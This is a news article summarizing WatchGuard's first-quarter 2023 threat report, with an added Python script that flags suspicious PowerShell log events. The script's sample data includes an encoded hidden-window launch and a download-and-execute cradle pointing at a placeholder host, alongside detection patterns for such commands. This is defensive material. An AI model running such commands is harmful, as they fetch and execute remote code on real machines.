International. In its most recent Internet Security Report, WatchGuard Technologies detailed the top malware trends and security threats across networks and endpoints during the first quarter of 2023.
In its pages, the report highlights fraudsters leveraging browser-based social engineering strategies, new malware with ties to nation states, high volumes of zero-day malware, and an increase in attacks that abuse built-in system tools ("living off the land"), among others. Additionally, the report includes a new section dedicated to quarterly ransomware tracking and analysis by the Threat Lab team.
"Organizations need to pay more attention to existing security solutions and strategies to stay protected against increasingly sophisticated threats," says Corey Nachreiner, director of security at WatchGuard, who emphasizes the usefulness of layered malware defenses to combat attacks that leverage system resources: "It can be done simply and effectively with a unified security platform, managed by specialized managed service providers," he says.
Key findings from the first quarter Internet Security Report include:
New trends in browser-based social engineering
Now that web browsers have more protections against pop-up abuse, attackers have opted to use browser notifications to force similar interactions. A new threat related to SEO poisoning was also identified.
3 out of 4 threats have actors from China and Russia behind them
75% of the threats that debuted in the top 10 malware list have strong ties to nation states (this does not necessarily imply that these malicious actors are backed by states). Threat Lab analysts first identified the Zusy malware, which targets the Chinese population with adware that installs a compromised browser and then uses it to hijack Windows settings.
Persistent attacks against Office products
Document-based threats that target Office products remain on the most widespread malware list. A relatively high number of attacks against Microsoft's Internet Security and Acceleration (ISA) firewall were observed on the network. This is surprising because that product was discontinued and stopped receiving updates.
"Living-off-the-land" attacks on the rise
The ViperSoftX malware reviewed in the report's DNS analysis is the latest example of the type of threat that leverages tools built into operating systems to meet its goals. The repeated presence of malware based on Microsoft Office and PowerShell in quarterly reports shows the importance of having endpoint protection that can distinguish legitimate from malicious use of popular tools such as PowerShell.
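The distinction drawn above, telling legitimate from malicious use of a built-in tool such as PowerShell, is exactly what endpoint detection logic has to encode. As an added example that is not from the report or from WatchGuard, the following Python triage scores constructed PowerShell script-block log records against a few widely used indicators (encoded commands, hidden windows, execution-policy bypass, download cradles, Invoke-Expression) and decodes any -EncodedCommand payload so the rules also see the hidden script. The sample events, rule weights and threshold are all assumptions made for this illustration.

```python
import base64
import re

# Constructed sample events shaped like flattened PowerShell script-block log
# records (Event ID 4104). They are illustrations, not data from the report.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "admin",
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"host": "ws02", "user": "jdoe",
     "script": "powershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws03", "user": "svc_build",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"host": "ws01", "user": "admin",
     "script": "Get-ChildItem C:\\Logs -Recurse | Measure-Object"},
]

# Heuristic rules: (name, pattern, weight). Weights and the threshold below are
# assumptions chosen for this example, not values from WatchGuard or the report.
RULES = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    ("download_cradle", re.compile(r"(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
]

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(script: str):
    """Return the plaintext of a -EncodedCommand argument, or None.

    PowerShell expects base64 over UTF-16LE, so both steps must succeed for
    the argument to be a genuine encoded command; anything else is left alone.
    """
    match = ENCODED_ARG.search(script)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Score one event; returns (score, sorted names of the rules that fired).

    Rules are run over the raw script and, when present, the decoded payload,
    so an encoded cradle still triggers the cradle/IEX rules.
    """
    texts = [event["script"]]
    decoded = decode_encoded_command(event["script"])
    if decoded is not None:
        texts.append(decoded)
    hits = set()
    for name, pattern, _weight in RULES:
        if any(pattern.search(t) for t in texts):
            hits.add(name)
    score = sum(w for name, _p, w in RULES if name in hits)
    return score, sorted(hits)


def triage(events, threshold: int = 4):
    """Return events scoring at or above the threshold, highest score first."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append({**ev, "score": score, "hits": hits})
    flagged.sort(key=lambda e: e["score"], reverse=True)
    return flagged


if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS):
        print(f"{ev['host']}/{ev['user']} score={ev['score']} hits={','.join(ev['hits'])}")
```

With the sample data, the routine administrative commands on ws01 score zero, while the encoded, hidden-window launch on ws02 and the download cradle on ws03 cross the threshold. Decoding the payload is what lets a single weighted rule set judge both the visible command line and what it actually runs, which is the kind of context an endpoint product needs before treating PowerShell activity as malicious.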
Malware distributor targeting Linux systems
A new malware distributor targeting Linux-based systems has been detected. It's a shocking reminder that while Windows is king in the enterprise realm, it's unwise to ignore Linux and macOS. Therefore, it is recommended to include them when implementing Endpoint Detection and Response (EDR) to maintain complete coverage of the environment.
70% of detections are zero-day malware
Most detections over unencrypted web traffic (70%) were zero-day malware, and the share rises to 93% for detections over encrypted web traffic. These threats can infect IoT devices, misconfigured servers, and equipment without strong host-based defenses such as Endpoint Defense and Response (EPDR).
New insights based on ransomware tracking data
Threat Lab recorded 852 victims posted on extortion sites and discovered 51 new ransomware variants. Ransomware groups continue to post victims at an alarming rate, including Fortune 500 companies.